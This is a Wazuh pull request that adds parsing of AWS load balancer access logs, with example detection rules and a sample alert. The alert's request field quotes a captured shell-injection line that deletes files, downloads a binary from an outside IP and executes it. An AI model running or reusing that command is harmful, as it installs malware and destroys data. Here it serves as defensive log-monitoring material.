### PR TITLE
Add support for AWS ELB

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -18,7 +18,7 @@ All notable changes to this project will be documented in this file.
   - Added endpoints to query and manage Rootcheck data. ([#6496](https://github.com/wazuh/wazuh/pull/6496))
 
 - **AWS Module:**
-  - Add support for AWS's Elastic Load Balancing. ([#6034](https://github.com/wazuh/wazuh/issues/6034))
+  - Added support for AWS load balancers (Application Load Balancer, Classic Load Balancer and Network Load Balancer). ([#6034](https://github.com/wazuh/wazuh/issues/6034))
 
 - **Framework:**
   - Improved `q` parameter on rules, decoders and cdb-lists modules to allow multiple nested fields. ([#6560](https://github.com/wazuh/wazuh/pull/6560))

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -15,7 +15,10 @@ All notable changes to this project will be documented in this file.
 - Added support to macOS in Vulnerability Detector. ([#6532](https://github.com/wazuh/wazuh/pull/6532))
 
 - **API:**
-  - Added endpoints to query and manage Rootcheck data.  ([#6496](https://github.com/wazuh/wazuh/pull/6496))
+  - Added endpoints to query and manage Rootcheck data. ([#6496](https://github.com/wazuh/wazuh/pull/6496))
+
+- **AWS Module:**
+  - Add support for AWS's Elastic Load Balancing. ([#6034](https://github.com/wazuh/wazuh/issues/6034))
 
 - **Framework:**
   - Improved `q` parameter on rules, decoders and cdb-lists modules to allow multiple nested fields. ([#6560](https://github.com/wazuh/wazuh/pull/6560))

--- a/src/config/wmodules-aws.c
+++ b/src/config/wmodules-aws.c
@@ -36,6 +36,9 @@ static const char *XML_BUCKET_NAME = "name";
 static const char *LEGACY_AWS_ACCOUNT_ALIAS = "LEGACY";
 
 static const char *CLOUDTRAIL_BUCKET_TYPE = "cloudtrail";
+static const char *ALB_BUCKET_TYPE = "alb";
+static const char *CLB_BUCKET_TYPE = "clb";
+static const char *NLB_BUCKET_TYPE = "nlb";
 static const char *CONFIG_BUCKET_TYPE = "config";
 static const char *VPCFLOW_BUCKET_TYPE = "vpcflow";
 static const char *CUSTOM_BUCKET_TYPE = "custom";
@@ -159,12 +162,13 @@ int wm_aws_read(const OS_XML *xml, xml_node **nodes, wmodule *module)
                     if (!strcmp(*nodes[i]->values, CLOUDTRAIL_BUCKET_TYPE) || !strcmp(*nodes[i]->values, CONFIG_BUCKET_TYPE)
                         || !strcmp(*nodes[i]->values, CUSTOM_BUCKET_TYPE) || !strcmp(*nodes[i]->values, GUARDDUTY_BUCKET_TYPE)
                         || !strcmp(*nodes[i]->values, VPCFLOW_BUCKET_TYPE) || !strcmp(*nodes[i]->values, CISCO_UMBRELLA_BUCKET_TYPE)
-                        || !strcmp(*nodes[i]->values, WAF_BUCKET_TYPE)) {
+                        || !strcmp(*nodes[i]->values, WAF_BUCKET_TYPE) || !strcmp(*nodes[i]->values, ALB_BUCKET_TYPE)
+                        || !strcmp(*nodes[i]->values, CLB_BUCKET_TYPE) || !strcmp(*nodes[i]->values, NLB_BUCKET_TYPE)) {
                         os_strdup(*nodes[i]->values, cur_bucket->type);
                     } else {
                         mterror(WM_AWS_LOGTAG, "Invalid bucket type '%s'. Valid ones are '%s', '%s', '%s', '%s', '%s', '%s' or '%s'",
                             *nodes[i]->values, CLOUDTRAIL_BUCKET_TYPE, CONFIG_BUCKET_TYPE, GUARDDUTY_BUCKET_TYPE, VPCFLOW_BUCKET_TYPE,
-                            WAF_BUCKET_TYPE, CISCO_UMBRELLA_BUCKET_TYPE, CUSTOM_BUCKET_TYPE);
+                            WAF_BUCKET_TYPE, CISCO_UMBRELLA_BUCKET_TYPE, CUSTOM_BUCKET_TYPE, ALB_BUCKET_TYPE, CLB_BUCKET_TYPE, NLB_BUCKET_TYPE);
                         OS_ClearNode(children);
                         return OS_INVALID;
                     }

--- a/wodles/aws/aws_s3.py
+++ b/wodles/aws/aws_s3.py
@@ -2035,6 +2035,64 @@ class AWSWAFBucket(AWSCustomBucket):
         return json.loads(json.dumps(content))
 
 
+class AWSALBBucket(AWSCustomBucket):
+
+    def __init__(self, **kwargs):
+        db_table_name = 'alb'
+        AWSCustomBucket.__init__(self, db_table_name, **kwargs)
+
+    def load_information_from_file(self, log_key):
+        """Load data from a ALB access log file."""
+        with self.decompress_file(log_key=log_key) as f:
+            fieldnames = (
+                "type", "time", "elb", "client_port", "target_port", "request_processing_time",
+                "target_processing_time", "response_processing_time", "elb_status_code", "target_status_code",
+                "received_bytes", "sent_bytes", "request", "user_agent", "ssl_cipher", "ssl_protocol",
+                "target_group_arn", "trace_id", "domain_name", "chosen_cert_arn", "matched_rule_priority",
+                "request_creation_time", "action_executed", "redirect_url", "error_reason", "target_port_list",
+                "target_status_code_list")
+            tsv_file = csv.DictReader(f, fieldnames=fieldnames, delimiter=' ')
+
+            return [dict(x, source='alb') for x in tsv_file]
+
+
+class AWSCLBBucket(AWSCustomBucket):
+
+    def __init__(self, **kwargs):
+        db_table_name = 'clb'
+        AWSCustomBucket.__init__(self, db_table_name, **kwargs)
+
+    def load_information_from_file(self, log_key):
+        """Load data from a CLB access log file."""
+        with self.decompress_file(log_key=log_key) as f:
+            fieldnames = (
+                "time", "elb", "client_port", "backend_port", "request_processing_time", "backend_processing_time",
+                "response_processing_time", "elb_status_code", "backend_status_code", "received_bytes", "sent_bytes",
+                "request", "user_agent", "ssl_cipher", "ssl_protocol")
+            tsv_file = csv.DictReader(f, fieldnames=fieldnames, delimiter=' ')
+
+            return [dict(x, source='clb') for x in tsv_file]
+
+
+class AWSNLBBucket(AWSCustomBucket):
+
+    def __init__(self, **kwargs):
+        db_table_name = 'nlb'
+        AWSCustomBucket.__init__(self, db_table_name, **kwargs)
+
+    def load_information_from_file(self, log_key):
+        """Load data from a NLB access log file."""
+        with self.decompress_file(log_key=log_key) as f:
+            fieldnames = (
+                "type", "version", "time", "elb", "listener", "client_port", "destination_port", "connection_time",
+                "tls_handshake_time", "received_bytes", "sent_bytes", "incoming_tls_alert", "chosen_cert_arn",
+                "chosen_cert_serial", "tls_cipher", "tls_protocol_version", "tls_named_group", "domain_name",
+                "alpn_fe_protocol", "alpn_client_preference_list")
+            tsv_file = csv.DictReader(f, fieldnames=fieldnames, delimiter=' ')
+
+            return [dict(x, source='nlb') for x in tsv_file]
+
+
 class AWSService(WazuhIntegration):
     """
     Class for getting AWS Services logs from API calls
@@ -2143,7 +2201,7 @@ class AWSInspector(AWSService):
     Class for getting AWS Inspector logs
     :param access_key: AWS access key id
     :param secret_key: AWS secret access key
-    :param profile: AWS profile
+    :param aws_profile: AWS profile
     :param iam_role_arn: IAM Role
     :param only_logs_after: Date after which obtain logs.
     :param region: Region of service
@@ -2645,8 +2703,8 @@ class AWSCloudWatchLogs(AWSService):
                 debug('No log streams were found for log group "{}"'.format(log_group), 1)
         except Exception:
             debug('++++ The specified "{}" log group does not exist or insufficient privileges to access it.'.format(log_group), 0)
-        finally:
-            return result_list
+
+        return result_list
 
     def purge_db(self, log_group):
         """Remove from AWS_Service.db any record for log streams that no longer exists on AWS CloudWatch.
@@ -2817,6 +2875,12 @@ def main(argv):
                 bucket_type = CiscoUmbrella
             elif options.type.lower() == 'waf':
                 bucket_type = AWSWAFBucket
+            elif options.type.lower() == 'alb':
+                bucket_type = AWSALBBucket
+            elif options.type.lower() == 'clb':
+                bucket_type = AWSCLBBucket
+            elif options.type.lower() == 'nlb':
+                bucket_type = AWSNLBBucket
             else:
                 raise Exception("Invalid type of bucket")
             bucket = bucket_type(reparse=options.reparse, access_key=options.access_key,

--- a/wodles/aws/aws_s3.py
+++ b/wodles/aws/aws_s3.py
@@ -2050,7 +2050,7 @@ class AWSALBBucket(AWSCustomBucket):
                 "received_bytes", "sent_bytes", "request", "user_agent", "ssl_cipher", "ssl_protocol",
                 "target_group_arn", "trace_id", "domain_name", "chosen_cert_arn", "matched_rule_priority",
                 "request_creation_time", "action_executed", "redirect_url", "error_reason", "target_port_list",
-                "target_status_code_list")
+                "target_status_code_list", "classification", "classification_reason")
             tsv_file = csv.DictReader(f, fieldnames=fieldnames, delimiter=' ')
 
             return [dict(x, source='alb') for x in tsv_file]


### PR DESCRIPTION
|Related issue|
|---|
|#6034|

Hi team,

This PR is related with #6034. In this PR we have added support for AWS load balancers. Now the AWS wodle is able to read and analyze the logs of these services.

### Local Rule (Example)
```
<!-- Local rules -->

<!-- Modify it at your will. -->
<!-- Copyright (C) 2015-2020, Wazuh Inc. -->

<group name="aws,elb">

  <rule id="100002" level="15">
    <if_sid>80200</if_sid>
    <field name="aws.source">alb</field>
    <description>AWS ALB alert.</description>
    <group>aws_alb,</group>
    <options>no_full_log</options>
  </rule>

  <rule id="100003" level="15">
    <if_sid>80200</if_sid>
    <field name="aws.source">clb</field>
    <description>AWS CLB alert.</description>
    <group>aws_clb,</group>
    <options>no_full_log</options>
  </rule>

  <rule id="100004" level="15">
    <if_sid>80200</if_sid>
    <field name="aws.source">nlb</field>
    <description>AWS NLB alert.</description>
    <group>aws_nlb,</group>
    <options>no_full_log</options>
  </rule>

</group>
```

### ALB Alert example
```json
{
   "timestamp":"2020-11-20T15:29:17.915+0000",
   "rule":{
      "level":15,
      "description":"AWS ALB alert.",
      "id":"100002",
      "firedtimes":2,
      "mail":true,
      "groups":[
         "aws",
         "elbaws_alb"
      ]
   },
   "agent":{
      "id":"000",
      "name":"wazuh-master"
   },
   "manager":{
      "name":"wazuh-master"
   },
   "id":"1605886157.1515840",
   "cluster":{
      "name":"wazuh",
      "node":"master-node"
   },
   "decoder":{
      "name":"json"
   },
   "data":{
      "integration":"aws",
      "aws":{
         "log_info":{
            "log_file":"ALB/AWSLogs/166157441623/elasticloadbalancing/us-west-1/2020/11/20/166157441623_elasticloadbalancing_us-west-1_app.ALB-framework-dev.959dfdbaed241613_20201120T1000Z_54.183.224.192_2t2dtogd.log.gz",
            "s3bucket":"XXXX"
         },
         "type":"http",
         "time":"2020-11-20T09:58:32.958384Z",
         "elb":"app/ALB-framework-dev/959dfdbaed241613",
         "client_port":"14.29.254.1:44852",
         "target_port":"10.0.0.125:80",
         "request_processing_time":"-1",
         "target_processing_time":"-1",
         "response_processing_time":"-1",
         "elb_status_code":"460",
         "target_status_code":"-",
         "received_bytes":"312",
         "sent_bytes":"0",
         "request":"GET http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+192.210.239.115/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1",
         "user_agent":"Hello, world",
         "ssl_cipher":"-",
         "ssl_protocol":"-",
         "target_group_arn":"arn:aws:elasticloadbalancing:us-west-1:166157441623:targetgroup/EC2/a7985a8385b86dc0",
         "trace_id":"Root=1-5fb79348-2ce78a6833f226010bfe9675",
         "domain_name":"-",
         "chosen_cert_arn":"-",
         "matched_rule_priority":"0",
         "request_creation_time":"2020-11-20T09:58:32.957000Z",
         "action_executed":"forward",
         "redirect_url":"-",
         "error_reason":"-",
         "target_port_list":"10.0.0.125:80",
         "target_status_code_list":"-",
         "classification":"-",
         "classification_reason":"-",
         "source":"alb"
      }
   },
   "location":"Wazuh-AWS"
}
```